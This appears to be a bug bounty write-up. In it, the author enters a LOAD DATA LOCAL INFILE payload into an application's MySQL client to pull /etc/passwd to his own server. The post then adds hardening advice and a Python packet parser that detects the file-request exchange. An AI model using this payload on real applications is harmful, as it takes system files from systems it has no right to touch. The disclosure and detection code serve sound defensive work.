This blog post describes one of my findings in a private program. The attack vector is simple, short and elegant (at least to me).
Simplicity is the ultimate sophistication.
One day, HackerOne invited me to join a private program. OK, I decided to have a look.
After creating a test account, I was asked to fill in the source info:
The application contains a MySQL client that connects to a MySQL server of our choosing. So I created a new user, database and table on my own server and opened the port. In the SQL SELECT box, I entered this payload:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE dadadb.dadatable FIELDS TERMINATED BY "\n"
Then I sent the request and received the target file /etc/passwd on my server:
mysql> select * from test;
+----------------------------------+
| value                            |
+----------------------------------+
| root:x:0:0:root:/root:/bin/bash  |
| ...                              |
+----------------------------------+
I submitted the report and got the bounty.
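From the defender's side, the file is read on the host where the application's MySQL client runs, and it happens whenever that client advertises the CLIENT_LOCAL_FILES capability and honours the server's LOCAL INFILE request packet; the fix is to disable local infile in the client library (for example PyMySQL's local_infile=False or mysql-connector-python's allow_local_infile=False) rather than to filter the SQL text. The Python below is an added example, not code from the original post: it parses MySQL wire packets to check whether a captured client handshake offers CLIENT_LOCAL_FILES and to flag any server packet that asks the client for a local file. All sample bytes are constructed here, not taken from a real capture.

```python
# Added example: parse MySQL wire packets (3-byte LE length, 1-byte seq id, payload)
# to audit a capture for the LOCAL INFILE file-read shown in this post.
from typing import Iterator, List, Tuple

CLIENT_LOCAL_FILES = 0x80    # capability bit a client sets if it will honour LOCAL INFILE
LOCAL_INFILE_REQUEST = 0xFB  # first payload byte of the server's "send me this file" packet

def iter_packets(stream: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (sequence_id, payload) per complete packet; stop at a truncated tail."""
    off = 0
    while off + 4 <= len(stream):
        length = int.from_bytes(stream[off:off + 3], "little")
        payload = stream[off + 4:off + 4 + length]
        if len(payload) < length:
            break
        yield stream[off + 3], payload
        off += 4 + length

def client_offers_local_files(handshake_response: bytes) -> bool:
    """HandshakeResponse41 starts with 4 bytes of capability flags; a hardened client clears 0x80."""
    if len(handshake_response) < 4:
        return False
    return bool(int.from_bytes(handshake_response[:4], "little") & CLIENT_LOCAL_FILES)

def find_infile_requests(server_stream: bytes) -> List[Tuple[int, str]]:
    """Return (sequence_id, requested path) for every server packet that asks the client
    to upload a local file. A server you do not control can send this in reply to any
    query, not only to LOAD DATA LOCAL INFILE, so the client-side flag is the real control."""
    hits = []
    for seq, payload in iter_packets(server_stream):
        if payload and payload[0] == LOCAL_INFILE_REQUEST:
            hits.append((seq, payload[1:].decode("utf-8", "replace")))
    return hits

def _packet(seq: int, payload: bytes) -> bytes:
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload

# Constructed samples (not a real capture): an OK packet, a request for /etc/passwd,
# another OK packet; plus two handshake-response prefixes differing only in the 0x80 bit.
OK = b"\x00\x00\x00\x02\x00\x00\x00"
SAMPLE_SERVER_STREAM = _packet(1, OK) + _packet(1, b"\xfb/etc/passwd") + _packet(3, OK)
SAMPLE_CLIENT_LOCAL_FILES = b"\x85\xa6\x0f\x00" + b"\x00\x00\x00\x01" + b"\x21" + b"\x00" * 23
SAMPLE_CLIENT_HARDENED = b"\x05\xa6\x0f\x00" + b"\x00\x00\x00\x01" + b"\x21" + b"\x00" * 23

if __name__ == "__main__":
    print("client offers LOCAL FILES:", client_offers_local_files(SAMPLE_CLIENT_LOCAL_FILES))
    for seq, path in find_infile_requests(SAMPLE_SERVER_STREAM):
        print(f"server packet seq={seq} requests local file {path!r}")
```

Run against a capture of the application's database connection, a non-empty result from find_infile_requests or a True from client_offers_local_files is the signal that the client still exposes its filesystem to whatever server it is pointed at.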
If you like my sharing, please consider buying me a coffee. ☕️